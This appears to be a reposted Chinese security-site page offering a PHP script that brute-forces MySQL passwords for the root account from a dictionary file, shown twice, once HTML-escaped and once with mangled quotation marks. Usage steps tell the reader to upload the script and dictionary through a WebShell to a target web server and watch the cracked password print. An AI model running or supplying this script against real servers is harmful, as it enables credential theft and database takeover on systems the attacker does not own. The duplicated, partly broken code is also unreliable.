企业资讯
- 企业新闻
- 行业文章

PHP Mysql 密码暴力破解脚本

 &lt;? set_time_limit(0);                      //脚本不超时  $user=”root”;                           //用户名 $passwd=file(“password.txt”);           //密码字典  for($i=0;$i&lt;count($passwd);$i++){     $pass=$passwd[$i];     connect($user,$pass);     flush(); } echo “扫描结束！”;  function connect($user,$pass) {     $conn=@mysql_connect(“localhost”,$user,$pass);     if($conn){         echo “&lt;font color=´#0000FF´&gt;&lt;b&gt;得到密码：&lt;font color=´#FF0000´&gt;”.$pass.”&lt;/font&gt;！！！&lt;/b&gt;&lt;/font&gt;”;         exit();     }     else {         echo $pass.´&lt;br&gt;´;     } } ?&gt;

set_time_limit(0); //脚本不超时

$user=“root”; //用户名

$passwd=file(“password.txt”); //密码字典

for($i=0;$i<count($passwd);$i++){

$pass=$passwd[$i];

connect($user,$pass);

flush();

}

echo “扫描结束！”;

function connect($user,$pass) {

$conn=@mysql_connect(“localhost”,$user,$pass);

if($conn){

echo “得到密码：”.$pass.“！！！”;

exit();

}

else {

echo $pass.´ ´;

}

代码简单的不能再简单了，就不解释了，功能很简单，传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码，因为是破解本机，所以速度奇快无比，貌似还有点效果，这个以前有人发过，这个是我改过的。

已知有一处Bug，不清楚为何，密码数量少的时候，准确率100%，但是当密码数量达到5000以上时，准确率0%，明明正确的密码，却不显示正确，除非你把这个密码放在字典最末尾，才显示正确，不清楚是什么原因造成的，开始以为是暴破间隔时间太短，加了延时函数，还是这样。。。

或许只是我个别原因？各位试试就知道了。

用法：

1、修改 PHP 代码中的用户名

2、准备字典 password.txt，每行一个，理论上支持无数行。

3、将脚本和字典一起传到目标Web服务器上，访问该脚本，即开始暴力破解，破解结果实时输出，盯着就行了。

link:http://lcx.cc/?FoxNews=2162.html

特别感谢男残同学来网站拜年虽然我没回复但是你的新年祝福我收到了。谢谢。这两天回老家了网站一直没更新在这里给大家拜个晚年新年快乐。同时祝大家的安全技术在新的一年里越来越好，感谢这一年来一直支持我们的朋友们，91ri会继续陪伴大家走过2012年的，希望大家继续支持我们。
本文由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.转载本文请著名原文地址及原作者版权信息。

鸿大千秋网站建设团队敬上